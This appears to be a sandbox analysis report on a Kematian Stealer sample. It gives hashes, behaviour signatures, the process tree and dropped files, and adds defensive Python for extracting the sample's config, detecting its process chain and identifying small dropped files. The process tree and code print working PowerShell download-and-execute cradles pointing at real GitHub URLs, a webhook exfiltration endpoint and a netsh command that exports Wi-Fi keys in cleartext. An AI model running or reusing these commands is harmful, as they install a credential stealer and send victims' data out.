Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14/07/2024, 23:10

General

  • Target

    main (1).exe

  • Size

    89KB

  • MD5

    755ee27c14914293c29ce91be08c20df

  • SHA1

    cd4b0c9f25261d59689416734f9495a0c30bde17

  • SHA256

    f57315d9f70cab67669c23e10b081aac70f336369605d8c5e3079411f61e36de

  • SHA512

    a250ef4af67d0b5cb4d671ae72f689fcfc4704c0ce99768a7408e0824b1465f9e94e9027f8e6b2855bc0dfe4201deca85333809d34fad617e7ab411c7e10540c

  • SSDEEP

    1536:R97fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfBweOy:Rp7DhdC6kzWypvaQ0FxyNTBfBt

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated:
  • URLs (exe.dropper):
    https://full-recording.gl.at.ply.gg:14817/data

Extracted

  • Language: ps1
  • Deobfuscated:
  • URLs (ps1.dropper):
    https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1

Extracted

  • Language: ps1
  • Deobfuscated:
  • URLs (ps1.dropper):
    https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
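The three extracted URLs above all come out of PowerShell command lines in the process tree: the first is the $webhook value the stager is launched with (the exfiltration endpoint, despite the exe.dropper label), the other two are module loads from the same GitHub repository. The following is an added example, not code from tria.ge or from the Kematian-Stealer project, that pulls the launcher configuration and URLs out of those command lines. It undoes only the tricks visible in this sample (the 'h' + 'ttps://' string split, the I'E'X quote insertion and the quoted ."DowNloAdSTRiNg"( method call) and maps both GitHub raw-URL shapes back to one owner/repo/ref/path so the hosting abuse can be pivoted on. The input strings are copied from the report's process tree; no network access is needed.

```python
import re
from urllib.parse import urlparse

# Constructed input: the two PowerShell command lines from the report's process
# tree (PID 1128 stager, PID 1412 module loader), copied as they appear there.
STAGER_CMDLINE = (
    "$ProgressPreference = 'SilentlyContinue';"
    "$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';"
    "$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';"
    "$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;"
    "$persistence=$false;$write_disk_only = $false;"
    "$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/"
    "main/frontend-src/main.ps1' -USeB | iex"
)
MODULE_CMDLINE = (
    "I'E'X((New-Object Net.Webclient).\"DowNloAdSTRiNg\"("
    "'https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))"
)

URL_RE = re.compile(r"https?://[^\s'\"()<>|]+")


def normalize(cmd: str) -> str:
    """Undo the cheap tricks in this sample so plain string matching works again:
    adjacent single-quoted literals joined with '+' ('h' + 'ttps://...'), quotes
    dropped into a bare token (I'E'X) and a quoted method name ."DowNloAdSTRiNg"(.
    Keyword-level normalisation only, not a PowerShell parser."""
    prev = None
    while prev != cmd:                      # repeat until no 'a' + 'b' pair is left
        prev = cmd
        cmd = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", cmd)
    # I'E'X -> IEX. Caveat: this would also eat an apostrophe inside a literal.
    cmd = re.sub(r"(?<=\w)'(?=\w)", "", cmd)
    cmd = re.sub(r'\."(\w+)"\(', r".\1(", cmd)   # ."Method"( -> .Method(
    return cmd


def extract_config(cmd: str) -> dict:
    """Collect $name = value assignments. $true/$false become bools, quoted
    literals become str, anything else (the 'Iwr ... | iex' stage load) is kept raw."""
    cfg = {}
    for m in re.finditer(r"\$(\w+)\s*=\s*([^;]+)", normalize(cmd)):
        name, raw = m.group(1), m.group(2).strip()
        if raw.lower() in ("$true", "$false"):
            cfg[name] = raw.lower() == "$true"
        elif len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "'\"":
            cfg[name] = raw[1:-1]
        else:
            cfg[name] = raw
    return cfg


def extract_urls(cmd: str) -> list:
    """URLs visible after normalisation; the webhook only becomes a URL once the
    split literal has been joined, which is the point of the split."""
    return sorted(set(URL_RE.findall(normalize(cmd))))


def github_raw_source(url: str):
    """Map both raw-content URL shapes GitHub serves to (owner, repo, ref, path)
    so the stager and module URLs group under one repository. None for other hosts."""
    p = urlparse(url)
    parts = p.path.strip("/").split("/")
    if p.hostname == "raw.githubusercontent.com" and len(parts) >= 4:
        owner, repo, ref, *path = parts
    elif p.hostname == "github.com" and len(parts) >= 5 and parts[2] == "raw":
        owner, repo, _, ref, *path = parts
    else:
        return None
    return owner, repo, ref, "/".join(path)


if __name__ == "__main__":
    for k, v in extract_config(STAGER_CMDLINE).items():
        print(f"{k:20} = {v!r}")
    for u in extract_urls(STAGER_CMDLINE) + extract_urls(MODULE_CMDLINE):
        print(u, github_raw_source(u))
```

Run as-is it prints the flag set the operator chose for this build (every feature flag off, placeholder encryption key, persistence disabled, which matches the absence of any persistence signature in the report) and groups the two GitHub URLs under Somali-Devs/Kematian-Stealer at ref main.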

Signatures

  • Blocklisted process makes network request (10 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely a geofence.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
  • Looks up external IP address via web service (1 IoC)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The command that matched here is "netsh wlan export profile folder=... key=clear" (see the process tree), which writes the saved Wi-Fi profiles with their plaintext keys to disk. That is credential harvesting, not helper DLL persistence; treat the signature name as a tool label and the netsh command line as the actual behaviour to hunt for.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses (10 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (16 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\main (1).exe
    "C:\Users\Admin\AppData\Local\Temp\main (1).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3724
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat "C:\Users\Admin\AppData\Local\Temp\main (1).exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:3508
        • C:\Windows\system32\mshta.exe
          mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex",0))
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1412
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:2256
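The tree above is a compact LOLBin chain: a dropped .bat under the user's Temp directory, a "net session" elevation probe, mshta running a vbscript: URI that hands PowerShell a download cradle, and PowerShell children that export Wi-Fi keys and pull further modules with IEX/DownloadString. The following is an added example, not part of the tria.ge report, of the process-creation rules a detection engineer would write from this tree and of running them over the tree itself. The events are constructed from the PIDs, images and command lines shown above (the longer command lines are trimmed to the tokens the rules look at); field names follow no particular EDR product.

```python
import re
from collections import defaultdict

# Constructed process-creation events mirroring the report's tree: pid, parent pid,
# image, command line. Long command lines are trimmed to the tokens that matter.
EVENTS = [
    dict(pid=3724, ppid=0, image=r"C:\Users\Admin\AppData\Local\Temp\main (1).exe",
         cmdline=r'"C:\Users\Admin\AppData\Local\Temp\main (1).exe"'),
    dict(pid=4884, ppid=3724, image=r"C:\Windows\system32\cmd.exe",
         cmdline=r'"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat "C:\Users\Admin\AppData\Local\Temp\main (1).exe""'),
    dict(pid=2600, ppid=4884, image=r"C:\Windows\system32\net.exe", cmdline="net session"),
    dict(pid=3508, ppid=2600, image=r"C:\Windows\system32\net1.exe", cmdline=r"C:\Windows\system32\net1 session"),
    dict(pid=456, ppid=4884, image=r"C:\Windows\system32\mshta.exe",
         cmdline=r'''mshta vbscript:close(createobject("wscript.shell").run("powershell $webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex",0))'''),
    dict(pid=1128, ppid=456, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$persistence=$false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex'''),
    dict(pid=3148, ppid=1128, image=r"C:\Windows\system32\netsh.exe",
         cmdline=r'"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear'),
    dict(pid=1412, ppid=1128, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))'''),
    dict(pid=2256, ppid=1128, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmdline=r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))'''),
]


def _norm(cmd: str) -> str:
    # Drop quotes inserted into bare tokens (I'E'X -> iex) and lower-case; keyword matching only.
    return re.sub(r"(?<=\w)'(?=\w)", "", cmd).lower()


def _name(ev: dict) -> str:
    return ev["image"].rsplit("\\", 1)[-1].lower()


# Each rule takes the event and its parent event (None if the parent is unknown).
def rule_cmd_runs_bat_from_temp(ev, parent):
    c = _norm(ev["cmdline"])
    return _name(ev) == "cmd.exe" and "\\appdata\\local\\temp\\" in c and ".bat" in c


def rule_net_session_admin_probe(ev, parent):
    # "net session" fails unless elevated; batch droppers use it as an is-admin check.
    # Match net.exe only: net1.exe is the worker it spawns and would double the alert.
    return (_name(ev) == "net.exe" and _norm(ev["cmdline"]).split()[1:2] == ["session"]
            and parent is not None and _name(parent) == "cmd.exe")


def rule_mshta_vbscript_launcher(ev, parent):
    c = _norm(ev["cmdline"])
    return _name(ev) == "mshta.exe" and "vbscript:" in c and "wscript.shell" in c


def rule_powershell_from_mshta(ev, parent):
    return _name(ev) == "powershell.exe" and parent is not None and _name(parent) == "mshta.exe"


def rule_powershell_download_cradle(ev, parent):
    if _name(ev) not in ("powershell.exe", "pwsh.exe"):
        return False
    c = _norm(ev["cmdline"])
    fetch = any(k in c for k in ("downloadstring", "downloadfile", "invoke-webrequest",
                                 "iwr ", "invoke-restmethod", "irm "))
    execute = re.search(r"\biex\b|invoke-expression", c) is not None
    return fetch and execute and "http" in c


def rule_netsh_wlan_cleartext_export(ev, parent):
    c = _norm(ev["cmdline"])
    return _name(ev) == "netsh.exe" and "wlan" in c and "export" in c and "key=clear" in c


RULES = [rule_cmd_runs_bat_from_temp, rule_net_session_admin_probe, rule_mshta_vbscript_launcher,
         rule_powershell_from_mshta, rule_powershell_download_cradle, rule_netsh_wlan_cleartext_export]


def run_rules(events):
    """Return {pid: [rule names that fired]} for every event that tripped at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(list)
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        for rule in RULES:
            if rule(ev, parent):
                hits[ev["pid"]].append(rule.__name__)
    return dict(hits)


def chain(pid, events):
    """Image names from the given process back to the root, so an alert carries its ancestry."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(_name(by_pid[pid]))
        pid = by_pid[pid]["ppid"]
    return names


if __name__ == "__main__":
    for pid, fired in run_rules(EVENTS).items():
        print(pid, " <- ".join(chain(pid, EVENTS)), fired)
```

Each rule is deliberately narrow enough to carry its own triage note (the netsh rule names the command, not "helper DLL"), and the chain() output is what turns six separate hits into one incident rooted at main (1).exe.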

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      abc27673d9c940ad74b41c58391d2412

      SHA1

      9a31a521a521dcd0f974ce6f7a50aecc69a50df0

      SHA256

      cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

      SHA512

      c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

    • C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat

      Filesize

      707B

      MD5

      c11ddd77e6fd87bfd91da46629012670

      SHA1

      d72617510c45e258583ad25801c92b97152bb2b9

      SHA256

      243627dc5cc3254b95baeaa0fff9e11c377125a587788abf7aa408129550fef7

      SHA512

      8eca3612c655f7c1054a993525689f34ac7f777b357e0a2ec48f4786aaba345c594eb7a306630eaed6739e1bc970054b0db279adb7c143da87f19fcd7519d411

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqourtis.vun.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\downloads.json

      Filesize

      4B

      MD5

      37a6259cc0c1dae299a7866489dff0bd

      SHA1

      2be88ca4242c76e8253ac62474851065032d6833

      SHA256

      74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b

      SHA512

      04f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f

    • C:\Users\Admin\AppData\Roaming\Kematian\GB-(FIPWTUZL)-(2024-07-14)-(UTC0)\DomainDetects\Edge.txt

      Filesize

      2B

      MD5

      81051bcc2cf1bedf378224b0a93e2877

      SHA1

      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

      SHA256

      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

      SHA512

      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

    • memory/1128-20-0x0000019DFFED0000-0x0000019DFFF46000-memory.dmp

      Filesize

      472KB

    • memory/1128-19-0x0000019DFFE00000-0x0000019DFFE44000-memory.dmp

      Filesize

      272KB

    • memory/1128-16-0x0000019DFFD60000-0x0000019DFFD84000-memory.dmp

      Filesize

      144KB

    • memory/1128-15-0x0000019DFFD60000-0x0000019DFFD8A000-memory.dmp

      Filesize

      168KB

    • memory/1128-14-0x0000019D82CA0000-0x0000019D831C8000-memory.dmp

      Filesize

      5.2MB

    • memory/1128-13-0x0000019E00000000-0x0000019E001C2000-memory.dmp

      Filesize

      1.8MB

    • memory/1128-65-0x0000019DE7890000-0x0000019DE78A2000-memory.dmp

      Filesize

      72KB

    • memory/1128-66-0x0000019DE77F0000-0x0000019DE77FA000-memory.dmp

      Filesize

      40KB

    • memory/1128-3-0x0000019DFFD30000-0x0000019DFFD52000-memory.dmp

      Filesize

      136KB

    • memory/1412-30-0x0000022FC9EB0000-0x0000022FC9EB8000-memory.dmp

      Filesize

      32KB

    • memory/2256-45-0x000002274FDD0000-0x00000227501A4000-memory.dmp

      Filesize

      3.8MB
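Most entries in the list above are runtime noise rather than stealer output: the CLR UsageLogs file and StartupProfileData-NonInteractive are .NET/PowerShell start-up artifacts, and __PSScriptPolicyTest_*.ps1 is the file PowerShell writes to test AppLocker/WDAC script enforcement. The files worth a second look are the tiny ones the stealer itself wrote, downloads.json (4 bytes) and DomainDetects\Edge.txt (2 bytes), because a file that small can be identified from its hashes alone. The following is an added example, not part of the tria.ge report, that hashes a constructed list of common placeholder contents and matches them against the sizes and digests shown above; the candidate list and the helper names are the author's own.

```python
import hashlib

# Constructed candidates: what a tiny result/placeholder file usually holds.
CANDIDATES = [b"", b"\n", b"\r\n", b"\r\n\r\n", b"null", b"[]", b"{}", b"0", b"1",
              b"true", b"false", b"null\n", b"null\r\n", b"[]\n", b"[]\r\n", b"{}\n", b"{}\r\n"]

ALGOS = ("md5", "sha1", "sha256", "sha512")


def fingerprint(data: bytes) -> dict:
    """All four digests the report lists, keyed by algorithm name."""
    return {a: hashlib.new(a, data).hexdigest() for a in ALGOS}


def identify(size: int, **digests: str):
    """Return the candidate whose length is `size` and whose digests all match the
    ones supplied (any subset of md5/sha1/sha256/sha512, case-insensitive), else None."""
    wanted = {a.lower(): v.lower() for a, v in digests.items()}
    for cand in CANDIDATES:
        if len(cand) != size:
            continue
        fp = fingerprint(cand)
        if all(fp.get(a) == v for a, v in wanted.items()):
            return cand
    return None


# Constructed from the report's Downloads list: (path, size in bytes, digests).
REPORT_FILES = [
    (r"C:\Users\Admin\AppData\Local\Temp\downloads.json", 4,
     {"md5": "37a6259cc0c1dae299a7866489dff0bd",
      "sha256": "74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b"}),
    (r"C:\Users\Admin\AppData\Roaming\Kematian\GB-(FIPWTUZL)-(2024-07-14)-(UTC0)\DomainDetects\Edge.txt", 2,
     {"md5": "81051bcc2cf1bedf378224b0a93e2877",
      "sha1": "ba8ab5a0280b953aa97435ff8946cbcbb2755a27"}),
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqourtis.vun.ps1", 60,
     {"md5": "d17fe0a3f47be24a6453e9ef58c94641"}),
]


def triage(files=REPORT_FILES) -> dict:
    """Map each listed path to its identified content, or None when no candidate matches."""
    return {path: identify(size, **digests) for path, size, digests in files}


if __name__ == "__main__":
    for path, content in triage().items():
        print(f"{path.rsplit(chr(92), 1)[-1]:45} -> {content!r}")
```

A 4-byte file hashing to the JSON literal null means the browser-download collector serialised an empty result, and a 2-byte CRLF in Edge.txt means the domain-detection pass for Edge found nothing; both are expected on a fresh sandbox image and tell the analyst that the sample ran to the collection stage even though it harvested nothing of value.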